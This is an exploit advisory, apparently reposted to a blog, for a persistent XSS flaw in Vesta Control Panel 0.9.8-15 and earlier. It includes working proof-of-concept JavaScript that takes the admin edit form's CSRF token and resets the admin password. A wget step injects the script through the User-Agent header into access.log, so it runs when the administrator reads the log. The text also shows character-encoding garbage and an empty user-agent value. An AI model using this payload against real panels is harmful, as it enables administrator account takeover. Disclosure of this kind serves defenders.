# Exploit Titleб═б═б═б═ :Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability# Vendor Homepageб═б═ :http://www.vestacp.com# Versionб═б═б═б═б═б═б═б═б═б═ :0.9.8-15# Exploit Authorб═б═б═ :Necmettin COSKUN @babayarisiб═# Blogб═б═б═б═б═б═б═б═б═б═б═б═б═ :http://ha.cker.io# Discovery dateб═б═б═ :16/02/2016# Tested on :Fedora23 - Chrome/Firefox/Maxthon We can use user-agent information to attack website like this. First of all we change our user-agent and add some dangerous javascript code ( XSS etc. ) and then we request to one of the website on target server then it is saved on access.log by server so when Administrator reads it the javascript code works that we added our user-agent information. Poc Exploit================1.Prepare evil js file function csrfWithToken(url,hanimisToken,password){ $.get(url, function(gelen) { $('body').append($(gelen)); $('form[id="vstobjects"]').css("display","none"); var token = $(hanimisToken).attr("token"); $('form[id="vstobjects"]').attr("action",url); $('input[name="v_password"]').val(password); $('form[id="vstobjects"]').submit(); });};//password = 1234567csrfWithToken("/edit/user/?user=admin","#token","123456"); 2. Make a Get request with evil user-agent to victim serverwget --header="Accept: text/html" --user-agent="" http://victimserver3. We wait Administrator to read access.log that injected our evil.js4. We log-in VestaCP via password we changedhttp(s)://victim:8083/б═б═б═б═Discovered by:================Necmettin COSKUNб═ |GrisapkaGuvenlikGrubu|4ewa2getha!
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment